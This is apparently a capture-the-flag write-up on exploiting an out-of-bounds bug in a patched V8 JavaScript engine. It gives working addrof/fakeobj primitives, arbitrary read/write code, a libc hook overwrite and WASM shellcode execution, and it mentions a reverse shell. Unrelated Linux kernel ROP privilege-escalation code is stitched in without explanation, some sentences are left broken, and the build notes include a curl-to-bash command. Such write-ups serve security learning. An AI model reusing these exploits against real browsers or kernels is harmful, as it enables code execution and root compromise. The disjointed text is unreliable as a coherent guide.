The dynamic type of the object (e.g. String, Uint8Array, etc)
The size of the object in bytes
The properties of the object and where they are stored
The type of the array elements (e.g. unboxed doubles, tagged pointers, etc)
Each javascript object is linked to a map. While the property names are usually stored in the map, the values are stored with the object itself. This allows objects with the same sort of structure to share maps, increasing efficiency.
There are three different regions that property values can be stored
Inside the object itself (inline properties)
In a separate dynamically-sized heap buffer (out-of-line properties)
If the property name is an integer index, then as array elements in a dynamically-sized heap array
to be honest, not entirely sure that this means, but I'll get it eventually
In the first two cases, the Map stores each property of the object with a linked slot number. Each object then contains all of the property values, matching with the slot number of the relevant property. The object does not store the name of the property, only the slot number.
I promise this makes sense - for example, let's take two array objects:
Once this is run, memory will contain two JSObject
instances and one Map
:
We can see that the Map
stores the properties a
and b
, giving them the slot values 0
and 1
respectively. The two objects object1
and object2
, because of their identical structure, both use Map1
as a map. The objects do not themselves know the name of the properties, only the slot values, which they assign a value to.
However, if we add another property - say c
, with value 60
- to object1
, they stop sharing the map:
If we then added a property c
to object2
, they would then share Map1
again! This works assigning each map something called a transition table, which is just a note of which map to transition to if a property of a certain name (and possibly type) are added to it. In the example above, Map2
would make a note that if a property c
is added to object2
then it should transition to use Map1
.
Let's see how this works out in memory for arrays using the debug
version of d8, along with the incredibly helpful %DebugPrint()
feature that comes along with it. We'll run it under gdb
so we can analyse memory as well, and make connections between all the parts.
Instead of creating our own objects, let's focus specifically on how it works for arrays, as that is what we are dealing with here.
That is a lot of information. Let's sift through the relevant parts.
Firstly, we notice that a
is a type JSArray
, stored in memory at 0x30b708b4dd70
. The array's map is stored at 0x09bccc0c2ed8
, with the properties (in this case length
) stored at 0x3659bdb00c70
. The elements
themselves are in a FixedDoubleArray
stored at 0x30b708b4dd50
.
Let's view memory itself. Hit Ctrl-C
and you'll go to the gef
prompt. Let's view the memory at the location of the JSArray
object itself, 0x30b708b4dd70
.
So the JSArray
first has its pointer to its own map, then a pointer to its properties, then a pointer to its elements and then its length (note that length
will be an smi, so a length of 2
is actually represented in memory as 2<<32
!).
One thing that is very curious is that the the elements
array is actually located 0x20
bytes ahead of memory from the JSArray
object itself. Interesting! Let's view it:
Note that elements
itself is a FixedDoubleArray
, so the first value will be a pointer to its map at 0x00003659bdb014f8
; this map doesn't concern us right now. The next value is the length of the FixedDoubleArray
, the smi of 0x2
again. After this, it gets interesting.
As expected, the next two entries are the doubles representing 1.5
and 2.5
, the entries in the array:
But immediately after in memory is the original JSArray
. So? Well, if we have an OOB read/write to an extra index past the array, the value we are accessing is the pointer in the JSArray
that points to the map. We can write to and read the map of the array.
Just to confirm this is correct, we're going to run the release version of d8 and check the output of .oob()
. The reason we have to use release is that the debug version has a lot more safety and OOB checks (I assume for fuzzing purposes) so will just break if we try to use a.oob()
. We need to run it with --shell exploit.js
, and you'll see why in a second.
Now we need to use our ftoi()
function to convert it to a hexadecimal integer:
Note that ftoi()
only exists because of the --shell
, which is why we needed it.
If our reasoning is correct, this is a pointer to the map, which is located at 0x2a0a9af82ed9
. Let's compare with GDB tells us:
The first value at the location of the JSArray
is, as we saw earlier, the pointer to the map. Not only that, but we successfully read it! Look - it's 0x2a0a9af82ed9
again!
Now we know we can read and write to the map that the array uses. How do we go from here?
The important thing to note is that sometimes a program will store values (pass by value), and sometimes it will store a pointer to a value (pass by reference). We can abuse this functionality, because an array of doubles will store the double values themselves while an array of objects will store pointers to the objects.
This means there is an extra link in the chain - if we do array[2]
on an array of doubles, V8 will go to the address in memory, read the value there, and return it. If we do array[2]
on an array of objects, V8 will go to the address in memory, read the value there, go to that address in memory, and return the object placed there.
We can see this behaviour by defining two arrays, one of doubles and one of custom objects:
Break out to gef
and see the elements
of both arrays.
float_arr
:
Again, 1.5
and 2.5
in floating-point form.
obj_arr
:
Note that the elements
array in the second case has values 0x3a38af8904f1
and 0x3a38af8906b1
. If our suspicions are correct, they would be pointers to the objects obj1
and obj2
. Do c
to continue the d8 instance, and print out the debug for the objects:
And look - so beautifully aligned!
What happens if we overwrite the map of an object array with the map of a float array? Logic dictates that it would treat it as a double rather than a pointer, resulting in a leak of the location of obj1
! Let's try it.
We leak 0x3a38af8904f1
- which is indeed the location of obj1
! We therefore can leak the location of objects. We call this an addrof
primitive, and we can add another function to our exploit.js
to simplify it:
Really importantly, the reason we can set map_obj
and get the map is because obj_arr.oob()
will return the value as a double, which we noted before! If it returned that object itself, the program would crash. You can see this in my writeup.
We can load it up in d8 ourselves and compare the results:
Perfect, it corresponds exactly!
The opposite of the addrof
primitive is called a fakeobj
primitive, and it works in the exact opposite way - we place a memory address at an index in the float array, and then change the map to that of the object array.
From here, an arbitrary read is relatively simple. It's important to remember that whatever fakeobj()
returns is an object, not a read! So if the data there does not form a valid object, it's useless.
The trick here is to create a float array, and then make the first index a pointer to a map for the float array. We are essentially faking an array object inside the actual array. Once we call fakeobj()
here, we have a valid, faked array.
But why does this help? Remember that the third memory address in a JSArray
object is an elements
pointer, which is a pointer to the list of values actually being stored. We can modify the elements
pointer by accessing index 2
of the real array, faking the elements
pointer to point to a location of our choice. Accessing index 0
of the fake array will then read from the fake pointer!
[TODO image, but not sure what exactly would help]
Because we need an index 2
, we're going to make the array of size 4, as 16-byte alignment is typically nice and reduces the probability of things randomly breaking.
Now we want to start an arb_read()
function. We can begin by tagging the pointer, and then placing a fakeobj
at the address of the arb_rw_arr
:
HOWEVER - this is not quite right! We want fake
to point at the first element of the FixedDoubleArray
elements
, so we need an offset of 0x20 bytes back (doubles are 8 bytes of space each, and we know from before that elements
is just ahead of the JSArray
itself in memory), so it looks like this:
Now we want to access arb_rw_arr[2]
to overwrite the fake elements
pointer in the fake array. We want to set this to the desired RW address addr
, but again we need an offset! This time it's 0x10 bytes, because the first index is 0x10 bytes from the start of the object as the first 8 bytes are a map and the second 8 are the length
smi:
And finally we return the leak. Putting it all together:
Logic would dictate that we could equally get an arbitrary write using the same principle, by simply setting the value instead of returning it. Unfortunately, not quite - if we look at , the initial_arb_write()
function fails:
In the blog post they tell us they're not sure why, and goes on to explain the intended method with ArrayBuffer
backing pointers. In they tell us that
The arbitrary write doesn't work with certain addresses due to the use of floats. The overwrite had precision loss with certain addresses, but this wasn't the case with ArrayBuffer backing pointers. The code handles that differently compared to the elements ptr.
I can confirm that running the initial_arb_write()
does, in fact, crash with a SIGSEGV. If anybody finds a fix, I'm sure they would be very interested (and I would too).
An ArrayBuffer
is simply . We combine this with the DataView
object to . These number types includes the ever-useful setInt64()
, which is where our reliability for handling the integers probably comes from.
The backing store of an ArrayBuffer
is much like the elements
of a JSArray
, in that it points to the address of the object that actually stores the information. It's placed 0x20 bytes ahead of the ArrayBuffer
in memory (which you can check with GDB).
We will have to use the initial_arb_write()
to perform this singular write, and hope that the address precision is good enough (if not, we just run it again).
From here, it's similar to userland exploitation.
The simplest approach, as any call to console.log()
will inevitably be freed immediately after. To do this, we'll need a libc leak.
In order for it to be reliable, it'll have to be through a section of memory allocated by V8 itself. We can use GDB to comb throught the memory of the area that stored the maps. I'm going to get exploit.js
to print out a bunch of the addresses we have. I'll then try and retrieve every single notable address I can.
Running it multiple times, the last 4 digits are consistent, implying that they're a fixed offset:
That bodes well. Running vmmap
, we can find the region they are in:
So the offsets appear to be 0x2ed9
and 0x2f79
. Let's throw that into exploit.js
and see if that's right by running it again and again. It appears to be, but randomly there is an issue and the address is not even in assigned memory - I assume it's at least in part due to the floating-point issues.
Now we have that, let's try combing through the map region and see if there are any other interesting values at fixed offsets.
We can see that, very close to the start of the region, there appear to be two heap addresses (and more later). This makes sense, as many maps will point to areas of the heap as the heap stores dynamically-sized data.
That seems more useful than what we have right now, so let's grab that and see if the offset is constant. Right now, the offsets are 0xaef60
and 0x212e0
. They appear to be constant. Let's throw those leaks in too.
It all seems to be pretty good, but a heap leak itself is not the most helpful. Let's keep digging, but looking at the heap this time, as that is probably more likely to store libc or binary addresses.
Ok, pretty useless. What about if we actually use the heap addresses we have, and see if there's anything useful there? The first one has nothing useful, but the second:
The vmmap
output for this specific run shows a binary base of 0x555555554000
and a heap base of 0x5555562f9000
. This makes the first address a binary address! Let's make sure it's a consistent offset from the base, and we're also gonna swap out our exploit to use the second heap address we spotted in the map region. And it is!
Now we just have to work out the GOT offset and read the entry to find libc base!
So the GOT entry is an offset of 0xd9a4c0
from base. Easy leak:
Then we just need to get system and free_hook offsets, and we are good to go. Pretty easy from inside GDB:
With base 0x7ffff7005000
, the offsets are easy to calculate:
And we can overwrite free hook and pop a calculator:
It does, in fact, work!
Unfortunately, as , when running the exploit on the Chrome binary itself (the actual browser provided with the challenge!) the __free_hook
route does not work. It's likely due to a different memory layout as a result of different processes running, so the leaks are not the same and the offsets are broken. Debugging would be nice, but it's very hard with the given binary. Instead we can use another classic approach and abuse WebAssembly to create a RWX page for our shellcode.
This approach is even better because it will (theoretically) work on any operating system, not be reliant on the presence of libc and __free_hook
as it allows us to run our own shellcode. I'm gonna save this in exploit2.js
.
If we create a function in WebAssembly, it will create a RWX page that we can leak. The WASM code itself is not important, we only care about the RWX page. To that effect I'll use the WASM used by Faith, because the website wasmfiddle
has been closed down and I cannot for the life of me find an alternative. Let me know if you do.
We can see that this creates an RWX page:
If we leak the addresses of wasm_mod
, wasm_instance
and f
, none of them are actually located in the RWX page, so we can't simply addrof()
and apply a constant offest. Instead, we're gonna comb memory for all references to the RWX page. The WASM objects likely need a reference to it of sorts, so it's possible a pointer is stored near in memory.
The last four are in the heap, so unlikely, but the first instance is near to the wasm_instance
and f
. The offset between wasm_instance
and that offset appears to be 0x87
. In reality it is 0x88
(remember pointer tagging!), but that works for us.
It spits out the right base, which is great. Now we just want to get shellcode for popping calculator as well as a method for copying the shellcode there. I'm gonna just (once again) shamelessly nab Faith's implementations for that, which are fairly self-explanatory.
And then we just copy it over and pop a calculator:
Running this under GDB causes it to crash for me, but running it in bash works fine:
With a calculator popped!
Create an index.html
with the following code:
Make sure exploit2.js
is in the same folder. Then load the index.html
with the version of Chrome bundled in the challenge:
And it pops calculator! You can also place it in another folder and use python's SimpleHTTPServer to serve it and connect that way - it works either way.
Well, we are hackers, we like the idea of a reverse shell, no? Plus it makes you feel way cooler to be able to do that.
Grabbing the reverse shell code from and modifying it slightly to change it to loopback to 127.0.0.1
:
Listening with nc -nvlp 4444
, we get the prompt for a password, which is 12345678
. Input that, and bingo! It even works on the Chrome instance!
First off, give a follow, they deserve it.
Secondly, WASM makes no sense to me, but oh well. Sounds like a security nightmare.
uint64_t pop_rdi = 0xffffffff811e08ec;
uint64_t swapgs = 0xffffffff8129011e;
uint64_t iretq_pop1 = 0xffffffff81022e1f;
uint64_t prepare_kernel_cred = 0xffffffff81066fa0;
uint64_t commit_creds = 0xffffffff81066e00;
int main() {
// [...]
// overflow
uint64_t payload[7];
int i = 6;
// prepare_kernel_cred(0)
payload[i++] = pop_rdi;
payload[i++] = 0;
payload[i++] = prepare_kernel_cred;
// [...]
}
0xffffffff810dcf72: pop rdx; ret
0xffffffff811ba595: mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
0xffffffff810a2e0d: mov rdx, rcx; ret;
0xffffffff8126caee: mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;
uint64_t pop_rdx = 0xffffffff810dcf72; // pop rdx; ret
uint64_t mov_rcx_rax = 0xffffffff811ba595; // mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
uint64_t mov_rdx_rcx = 0xffffffff810a2e0d; // mov rdx, rcx; ret;
uint64_t mov_rdi_rax = 0xffffffff8126caee; // mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;
// [...]
// commit_creds()
payload[i++] = pop_rdx;
payload[i++] = 0;
payload[i++] = mov_rcx_rax;
payload[i++] = mov_rdx_rcx;
payload[i++] = mov_rdi_rax;
payload[i++] = commit_creds;
0xffffffff8129011e: swapgs; ret;
0xffffffff81022e1f: iretq; pop rbp; ret;
// commit_creds()
payload[i++] = swapgs;
payload[i++] = iretq;
payload[i++] = user_rip;
payload[i++] = user_cs;
payload[i++] = user_rflags;
payload[i++] = user_rsp;
payload[i++] = user_ss;
payload[i++] = (uint64_t) escalate;
// gcc -static -o exploit exploit.c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdint.h>
void get_shell(void){
puts("[*] Returned to userland");
system("/bin/sh");
}
uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rsp;
uint64_t user_rflags;
uint64_t user_rip = (uint64_t) get_shell;
void save_state(){
puts("[*] Saving state");
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_rsp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[+] Saved state");
}
void escalate() {
__asm__(
".intel_syntax noprefix;"
"xor rdi, rdi;"
"movabs rcx, 0xffffffff81066fa0;" // prepare_kernel_cred
"call rcx;"
"mov rdi, rax;"
"movabs rcx, 0xffffffff81066e00;" // commit_creds
"call rcx;"
"swapgs;"
"mov r15, user_ss;"
"push r15;"
"mov r15, user_rsp;"
"push r15;"
"mov r15, user_rflags;"
"push r15;"
"mov r15, user_cs;"
"push r15;"
"mov r15, user_rip;"
"push r15;"
"iretq;"
".att_syntax;"
);
}
uint64_t pop_rdi = 0xffffffff811e08ec;
uint64_t swapgs = 0xffffffff8129011e;
uint64_t iretq = 0xffffffff81022e1f; // iretq; pop rbp; ret
uint64_t prepare_kernel_cred = 0xffffffff81066fa0;
uint64_t commit_creds = 0xffffffff81066e00;
uint64_t pop_rdx = 0xffffffff810dcf72; // pop rdx; ret
uint64_t mov_rcx_rax = 0xffffffff811ba595; // mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
uint64_t mov_rdx_rcx = 0xffffffff810a2e0d; // mov rdx, rcx; ret;
uint64_t mov_rdi_rax = 0xffffffff8126caee; // mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;
int main() {
save_state();
// communicate with the module
int fd = open("/dev/kernel_rop", O_RDWR);
printf("FD: %d\n", fd);
// overflow
uint64_t payload[25];
int i = 6;
// prepare_kernel_cred(0)
payload[i++] = pop_rdi;
payload[i++] = 0;
payload[i++] = prepare_kernel_cred;
// commit_creds()
payload[i++] = pop_rdx;
payload[i++] = 0;
payload[i++] = mov_rcx_rax;
payload[i++] = mov_rdx_rcx;
payload[i++] = mov_rdi_rax;
payload[i++] = commit_creds;
// commit_creds()
payload[i++] = swapgs;
payload[i++] = iretq;
payload[i++] = user_rip;
payload[i++] = user_cs;
payload[i++] = user_rflags;
payload[i++] = user_rsp;
payload[i++] = user_ss;
payload[i++] = (uint64_t) escalate;
write(fd, payload, 0);
}
-cpu qemu64,+smep,+smap
$ sudo apt update
$ sudo apt install git vim
$ git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git
$ echo "export PATH=/tools/depot_tools:$PATH" >> ~/.bashrc
$ fetch v8
$ cd v8
v8$ ./build/install-build-deps.sh
v8$ git checkout 6dc88c191f5ecc5389dc26efa3ca0907faef3598
v8$ gclient sync
$ 7z x Chrome.tar.gz
$ tar -xvf Chrome.tar
$ cp Chrome/oob.diff .
v8$ git apply ../oob.diff
v8$ ./tools/dev/v8gen.py x64.release
v8$ ninja -C ./out.gn/x64.release
Traceback (most recent call last):
File "/tools/depot_tools/ninja.py", line 14, in <module>
import gclient_paths
File "/tools/depot_tools/gclient_paths.py", line 24, in <module>
def FindGclientRoot(from_dir, filename='.gclient'):
File "/usr/lib/python3.6/functools.py", line 477, in lru_cache
raise TypeError('Expected maxsize to be an integer or None')
TypeError: Expected maxsize to be an integer or None
$ sudo apt install python3.8
$ sudo ln -sf /usr/bin/python3.8 /usr/bin/python3
$ ninja --version
depot_tools/ninja.py: Could not find Ninja in the third_party of the current project, nor in your PATH.
Please take one of the following actions to install Ninja:
- If your project has DEPS, add a CIPD Ninja dependency to DEPS.
- Otherwise, add Ninja to your PATH *after* depot_tools.
$ sudo apt install ninja-build
v8$ ninja -C ./out.gn/x64.release
v8$ ./tools/dev/v8gen.py x64.debug
v8$ ninja -C ./out.gn/x64.debug
$ sudo ln -sf /usr/bin/python3.6 /usr/bin/python3
$ bash -c "$(curl -fsSL https://gef.blah.cat/sh)"
diff --git a/src/bootstrapper.cc b/src/bootstrapper.cc
index b027d36..ef1002f 100644
--- a/src/bootstrapper.cc
+++ b/src/bootstrapper.cc
@@ -1668,6 +1668,8 @@ void Genesis::InitializeGlobal(Handle<JSGlobalObject> global_object,
Builtins::kArrayPrototypeCopyWithin, 2, false);
SimpleInstallFunction(isolate_, proto, "fill",
Builtins::kArrayPrototypeFill, 1, false);
+ SimpleInstallFunction(isolate_, proto, "oob",
+ Builtins::kArrayOob,2,false);
SimpleInstallFunction(isolate_, proto, "find",
Builtins::kArrayPrototypeFind, 1, false);
SimpleInstallFunction(isolate_, proto, "findIndex",
diff --git a/src/builtins/builtins-array.cc b/src/builtins/builtins-array.cc
index 8df340e..9b828ab 100644
--- a/src/builtins/builtins-array.cc
+++ b/src/builtins/builtins-array.cc
@@ -361,6 +361,27 @@ V8_WARN_UNUSED_RESULT Object GenericArrayPush(Isolate* isolate,
return *final_length;
}
} // namespace
+BUILTIN(ArrayOob){
+ uint32_t len = args.length();
+ if(len > 2) return ReadOnlyRoots(isolate).undefined_value();
+ Handle<JSReceiver> receiver;
+ ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+ isolate, receiver, Object::ToObject(isolate, args.receiver()));
+ Handle<JSArray> array = Handle<JSArray>::cast(receiver);
+ FixedDoubleArray elements = FixedDoubleArray::cast(array->elements());
+ uint32_t length = static_cast<uint32_t>(array->length()->Number());
+ if(len == 1){
+ //read
+ return *(isolate->factory()->NewNumber(elements.get_scalar(length)));
+ }else{
+ //write
+ Handle<Object> value;
+ ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+ isolate, value, Object::ToNumber(isolate, args.at<Object>(1)));
+ elements.set(length,value->Number());
+ return ReadOnlyRoots(isolate).undefined_value();
+ }
+}
BUILTIN(ArrayPush) {
HandleScope scope(isolate);
diff --git a/src/builtins/builtins-definitions.h b/src/builtins/builtins-definitions.h
index 0447230..f113a81 100644
--- a/src/builtins/builtins-definitions.h
+++ b/src/builtins/builtins-definitions.h
@@ -368,6 +368,7 @@ namespace internal {
TFJ(ArrayPrototypeFlat, SharedFunctionInfo::kDontAdaptArgumentsSentinel) \
/* https://tc39.github.io/proposal-flatMap/#sec-Array.prototype.flatMap */ \
TFJ(ArrayPrototypeFlatMap, SharedFunctionInfo::kDontAdaptArgumentsSentinel) \
+ CPP(ArrayOob) \
\
/* ArrayBuffer */ \
/* ES #sec-arraybuffer-constructor */ \
diff --git a/src/compiler/typer.cc b/src/compiler/typer.cc
index ed1e4a5..c199e3a 100644
--- a/src/compiler/typer.cc
+++ b/src/compiler/typer.cc
@@ -1680,6 +1680,8 @@ Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
return Type::Receiver();
case Builtins::kArrayUnshift:
return t->cache_->kPositiveSafeInteger;
+ case Builtins::kArrayOob:
+ return Type::Receiver();
// ArrayBuffer functions.
case Builtins::kArrayBufferIsView:
+ SimpleInstallFunction(isolate_, proto, "oob",
+ Builtins::kArrayOob,2,false);
BUILTIN(ArrayOob){
uint32_t len = args.length();
if(len > 2) return ReadOnlyRoots(isolate).undefined_value();
Handle<JSReceiver> receiver;
ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
isolate, receiver, Object::ToObject(isolate, args.receiver())
);
Handle<JSArray> array = Handle<JSArray>::cast(receiver);
FixedDoubleArray elements = FixedDoubleArray::cast(array->elements());
uint32_t length = static_cast<uint32_t>(array->length()->Number());
if(len == 1) {
//read
return *(isolate->factory()->NewNumber(elements.get_scalar(length)));
} else {
//write
Handle<Object> value;
ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
isolate, value, Object::ToNumber(isolate, args.at<Object>(1))
);
elements.set(length,value->Number());
return ReadOnlyRoots(isolate).undefined_value();
}
}
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
function ftoi(val) { // typeof(val) = float
f64_buf[0] = val;
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}
function itof(val) { // typeof(val) = BigInt
u64_buf[0] = Number(val & 0xffffffffn);
u64_buf[1] = Number(val >> 32n);
return f64_buf[0];
}
./d8 --shell ./exploit.js
var object1 = {a: 20, b: 40};
var object2 = {a: 30, b: 60};
$ gdb d8
gef➤ run --allow-natives-syntax
V8 version 7.5.0 (candidate)
d8> a = [1.5, 2.5]
[1.5, 2.5]
d8> %DebugPrint(a)
DebugPrint: 0x30b708b4dd71: [JSArray]
- map: 0x09bccc0c2ed9 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
- prototype: 0x2358a3991111 <JSArray[0]>
- elements: 0x30b708b4dd51 <FixedDoubleArray[2]> [PACKED_DOUBLE_ELEMENTS]
- length: 2
- properties: 0x3659bdb00c71 <FixedArray[0]> {
#length: 0x0418bc0c01a9 <AccessorInfo> (const accessor descriptor)
}
- elements: 0x30b708b4dd51 <FixedDoubleArray[2]> {
0: 1.5
1: 2.5
}
0x9bccc0c2ed9: [Map]
- type: JS_ARRAY_TYPE
- instance size: 32
- inobject properties: 0
- elements kind: PACKED_DOUBLE_ELEMENTS
- unused property fields: 0
- enum length: invalid
- back pointer: 0x09bccc0c2e89 <Map(HOLEY_SMI_ELEMENTS)>
- prototype_validity cell: 0x0418bc0c0609 <Cell value= 1>
- instance descriptors #1: 0x2358a3991f49 <DescriptorArray[1]>
- layout descriptor: (nil)
- transitions #1: 0x2358a3991eb9 <TransitionArray[4]>Transition array #1:
0x3659bdb04ba1 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_DOUBLE_ELEMENTS) -> 0x09bccc0c2f29 <Map(HOLEY_DOUBLE_ELEMENTS)>
- prototype: 0x2358a3991111 <JSArray[0]>
- constructor: 0x2358a3990ec1 <JSFunction Array (sfi = 0x418bc0caca1)>
- dependent code: 0x3659bdb002c1 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>
- construction counter: 0
[1.5, 2.5]
d8>
gef➤ x/4gx 0x30b708b4dd70
0x30b708b4dd70: 0x000009bccc0c2ed9 0x00003659bdb00c71
0x30b708b4dd80: 0x000030b708b4dd51 0x0000000200000000
gef➤ x/10gx 0x000030b708b4dd50
0x30b708b4dd50: 0x00003659bdb014f9 0x0000000200000000 <- elements (map, length)
0x30b708b4dd60: 0x3ff8000000000000 0x4004000000000000 <- array entries
0x30b708b4dd70: 0x000009bccc0c2ed9 0x00003659bdb00c71 <- JSArray
0x30b708b4dd80: 0x000030b708b4dd51 0x0000000200000000
0x30b708b4dd90: 0x00003659bdb01cc9 0x0000000400000000
gef➤ p/f 0x3ff8000000000000
$1 = 1.5
gef➤ p/f 0x4004000000000000
$2 = 2.5
$ gdb d8
gef➤ run --allow-natives-syntax --shell exploit.js
V8 version 7.5.0 (candidate)
d8> a = [1.5, 2.5]
[1.5, 2.5]
d8> a.oob()
2.28382032514e-310
d8> ftoi(a.oob()).toString(16)
"2a0a9af82ed9"
d8> %DebugPrint(a)
0x2d83ee78e0b9 <JSArray[2]>
[1.5, 2.5]
d8> ^C
gef➤ x/4gx 0x2d83ee78e0b8
0x2d83ee78e0b8: 0x00002a0a9af82ed9 0x00000db811140c71
0x2d83ee78e0c8: 0x00002d83ee78e099 0x0000000200000000
var float_arr = [1.5, 2.5]
var obj1 = {a: 1, b: 2}
var obj2 = {a: 5, b: 10}
var obj_arr = [obj1, obj2]
gef➤ run --allow-natives-syntax --shell exploit.js
V8 version 7.5.0 (candidate)
d8> var float_arr = [1.5, 2.5]
undefined
d8> var obj1 = {a: 1, b: 2}
undefined
d8> var obj2 = {a: 5, b: 10}
undefined
d8> var obj_arr = [obj1, obj2]
undefined
d8> %DebugPrint(float_arr)
0x3a38af88e0c9 <JSArray[2]>
[1.5, 2.5]
d8> %DebugPrint(obj_arr)
0x3a38af8915f1 <JSArray[2]>
[{a: 1, b: 2}, {a: 5, b: 10}]
gef➤ x/4gx 0x3a38af88e0c8
0x3a38af88e0c8: 0x0000179681882ed9 0x0000389170c80c71
0x3a38af88e0d8: 0x00003a38af88e0a9 0x0000000200000000
gef➤ x/4gx 0x00003a38af88e0a8 <-- access elements array
0x3a38af88e0a8: 0x0000389170c814f9 0x0000000200000000
0x3a38af88e0b8: 0x3ff8000000000000 0x4004000000000000
gef➤ x/4gx 0x3a38af8915f0
0x3a38af8915f0: 0x0000179681882f79 0x0000389170c80c71
0x3a38af891600: 0x00003a38af8915d1 0x0000000200000000
gef➤ x/4gx 0x00003a38af8915d0 <-- access elements array
0x3a38af8915d0: 0x0000389170c80801 0x0000000200000000
0x3a38af8915e0: 0x00003a38af8904f1 0x00003a38af8906b1
d8> %DebugPrint(obj1)
0x3a38af8904f1 <Object map = 0x17968188ab89>
{a: 1, b: 2}
d8> %DebugPrint(obj2)
0x3a38af8906b1 <Object map = 0x17968188ab89>
{a: 5, b: 10}
d8> var map_float = float_arr.oob()
d8> obj_arr.oob(map_float)
d8> ftoi(obj_arr[0]).toString(16)
"3a38af8904f1"
var float_arr = [1.5, 2.5];
var map_float = float_arr.oob();
var initial_obj = {a:1}; // placeholder object
var obj_arr = [initial_obj];
var map_obj = obj_arr.oob();
function addrof(obj) {
obj_arr[0] = obj; // put desired obj for address leak into index 0
obj_arr.oob(map_float); // change to float map
let leak = obj_arr[0]; // read address
obj_arr.oob(map_obj); // change back to object map, to prevent issues down the line
return ftoi(leak); // return leak as an integer
}
$ gdb d8
gef➤ run --allow-natives-syntax --shell exploit.js
V8 version 7.5.0 (candidate)
d8> obj = {a:1}
{a: 1}
d8> %DebugPrint(obj)
0x031afef4ebe9 <Object map = 0x3658c164ab39>
{a: 1}
d8> addrof(obj).toString(16)
"31afef4ebe9"
function fakeobj(addr) {
float_arr[0] = itof(addr); // placed desired address into index 0
float_arr.oob(map_obj); // change to object map
let fake = float_arr[0]; // get fake object
float_arr.oob(map_float); // swap map back
return fake; // return object
}
// array for access to arbitrary memory addresses
var arb_rw_arr = [map_float, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));
function arb_read(addr) {
// tag pointer
if (addr % 2n == 0)
addr += 1n;
// place a fake object over the elements FixedDoubleArray of the valid array
let fake = fakeobj(addrof(arb_rw_arr));
}
function arb_read(addr) {
// tag pointer
if (addr % 2n == 0)
addr += 1n;
// place a fake object over the elements FixedDoubleArray of the valid array
// we know the elements array is placed just ahead in memory, so with a length
// of 4 it's an offset of 4 * 0x8 = 0x20
let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
}
// overwrite `elements` field of fake array with address
// we must subtract 0x10 as there are two 64-bit values
// initially with the map and a size smi, so 0x10 offset
arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);
// array for access to arbitrary memory addresses
var arb_rw_arr = [map_float, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));
function arb_read(addr) {
// tag pointer
if (addr % 2n == 0)
addr += 1n;
// place a fake object over the elements FixedDoubleArray of the valid array
// we know the elements array is placed just ahead in memory, so with a length
// of 4 it's an offset of 4 * 0x8 = 0x20
let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
// overwrite `elements` field of fake array with address
// we must subtract 0x10 as there are two 64-bit values
// initially with the map and a size smi, so 0x10 offset
arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);
// index 0 will returns the arbitrary read value
return ftoi(fake[0]);
}
function initial_arb_write(addr, val) {
// place a fake object and change elements, as before
let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);
// Write to index 0
fake[0] = itof(BigInt(val));
}
function arb_write(addr, val) {
// set up ArrayBuffer and DataView objects
let buf = new ArrayBuffer(8);
let dataview = new DataView(buf);
let buf_addr = addrof(buf);
let backing_store_addr = buf_addr + 0x20n;
// write address to backing store
initial_arb_write(backing_store_addr, addr);
// write data to offset 0, with little endian true
dataview.setBigUint64(0, BigInt(val), true);
}
console.log("[+] Float Map: 0x" + ftoi(map_float).toString(16))
console.log("[+] Object Map: 0x" + ftoi(map_obj).toString(16))
[+] Float Map: 0x2b1dc2e82ed9
[+] Object Map: 0x2b1dc2e82f79
gef➤ vmmap
[...]
0x00002b1dc2e80000 0x00002b1dc2ec0000 0x0000000000000000 rw-
[...]
$ gdb ./d8
gef➤ run --allow-natives-syntax --shell exploit.js
[+] Address of Arbitrary RW Array: 0x64d2a00f499
[+] Float Map: 0x1d8734482ed9
[+] Object Map: 0x1d8734482f79
[+] Map Region Start: 0x1d8734480000
V8 version 7.5.0 (candidate)
d8> ^C
gef➤ vmmap
[...]
0x00001d8734480000 0x00001d87344c0000 0x0000000000000000 rw-
[...]
0x0000555555554000 0x00005555557e7000 0x0000000000000000 r-- /home/andrej/Desktop/oob-v8/v8/out.gn/x64.release/d8
0x00005555557e7000 0x00005555562af000 0x0000000000293000 r-x /home/andrej/Desktop/oob-v8/v8/out.gn/x64.release/d8
0x00005555562af000 0x00005555562ef000 0x0000000000d5b000 r-- /home/andrej/Desktop/oob-v8/v8/out.gn/x64.release/d8
0x00005555562ef000 0x00005555562f9000 0x0000000000d9b000 rw- /home/andrej/Desktop/oob-v8/v8/out.gn/x64.release/d8
0x00005555562f9000 0x00005555563c6000 0x0000000000000000 rw- [heap]
[...]
0x00007ffff7005000 0x00007ffff71ec000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/libc-2.27.so
